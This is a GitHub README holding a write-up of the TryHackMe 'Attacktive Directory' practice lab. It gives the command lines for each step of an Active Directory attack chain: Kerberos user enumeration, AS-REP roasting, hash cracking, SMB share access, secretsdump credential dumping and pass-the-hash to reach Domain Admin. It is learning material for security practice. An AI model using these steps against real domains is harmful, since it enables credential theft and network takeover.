cybe07/Active-Directory-Labs

GitHub: cybe07/Active-Directory-Labs

一个专注于 Active Directory 攻击链学习的实战项目，解决如何在实验环境中复现与掌握 AD 渗透技术路径的问题。

Stars: 0 | Forks: 0

# 🛡️ Attacktive Directory Write-up

## 📌 Overview * **Room:** Attacktive Directory * **Domain:** spookysec.local * **Objective:** Compromise the domain and retrieve all flags This lab demonstrates a full Active Directory attack chain, leveraging Kerberos misconfigurations, credential exposure, and privilege escalation techniques to achieve Domain Admin access. ## 📑 Table of Contents * [🌐 Initial Enumeration](#-initial-enumeration) * [🧑‍💻 User Enumeration](#-user-enumeration) * [🔐 AS-REP Roasting](#-as-rep-roasting) * [🔓 Hash Cracking](#-hash-cracking) * [📂 SMB Enumeration](#-smb-enumeration) * [🔐 Credential Extraction](#-credential-extraction) * [🧠 Privilege Escalation](#-privilege-escalation) * [🔑 Pass-the-Hash](#-pass-the-hash) * [🏁 Flags](#-flags) * [📚 Key Takeaways](#-key-takeaways) ## 🌐 Initial Enumeration ``` nmap -sC -sV -p- ``` ### 🔍 Findings: * 88 → Kerberos * 389 → LDAP * 445 → SMB * 139 → NetBIOS * 3389 → RDP ✔️ Confirmed Active Directory Domain Controller 📸 ![Nmap](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/nmap.png) ## 🧑‍💻 User Enumeration ``` kerbrute userenum --dc -d spookysec.local userlist.txt ``` ### 🔍 Result: * Valid domain users discovered 📸 ![Kerbrute](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/kerbrute.png) ## 🔐 AS-REP Roasting ``` impacket-GetNPUsers spookysec.local/ -usersfile user.txt -no-pass -dc-ip ``` ### 🎯 Result: * Retrieved AS-REP hash 📸 ![ASREP](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/asrep.png) ## 🔓 Hash Cracking ``` hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt ``` ### 🎯 Result: * Password recovered 📸 ![Hashcat](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/hashcat.png) ## 📂 SMB Enumeration ``` smbclient -L /// -U ``` ### 🔍 Shares Found: * ADMIN$ * backup * IPC$ * NETLOGON * SYSVOL 📸 ![SMB](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/smb.png) ## 🔐 Credential Extraction ``` echo "" | base64 -d ``` ### 🎯 Result: * Found credentials for backup user 📸 ![Decode](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/decode.png) ## 🧠 Privilege Escalation ``` impacket-secretsdump spookysec.local/backup:@ ``` ### 🎯 Result: * Dumped NTLM hashes: * Administrator * svc-admin * backup 📸 ![Secretsdump](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/secretsdump.png) ## 🔑 Pass-the-Hash ``` evil-winrm -i -u Administrator -H ``` ### 🎯 Result: * Domain Admin access achieved ## 🏁 Flags | User | Location | | ------------- | -------- | | Administrator | Desktop | | svc-admin | Desktop | | backup | Desktop | ⚠️ Flags hidden for ethical reasons ## 🔥 Attack Chain ``` Nmap → Kerbrute → AS-REP → Hashcat → SMB → Decode → Secretsdump → PtH → DA ``` ## 📚 Key Takeaways * Kerberos misconfigurations can lead to credential exposure * AS-REP roasting enables offline password attacks * Base64 encoding is not secure * Backup privileges can expose the entire domain * Pass-the-Hash avoids the need to crack passwords ## 🚀 Author * 💻 cybe07 * 🔗 https://github.com/cybe07

标签：Active Directory, AS-REP Roasting, Credential Extraction, CTF学习, CTI, DNS 解析, DOS头擦除, Hash Cracking, Kerberos 协议, Pass-the-Hash, PE 加载器, Plaso, Privilege Escalation, SMB Enumeration, SMB 共享, TryHackMe, 内网渗透, 域控, 域渗透, 实战靶场, 密码破解, 模拟器, 电子数据取证, 票据攻击, 网络安全学习, 逆向工具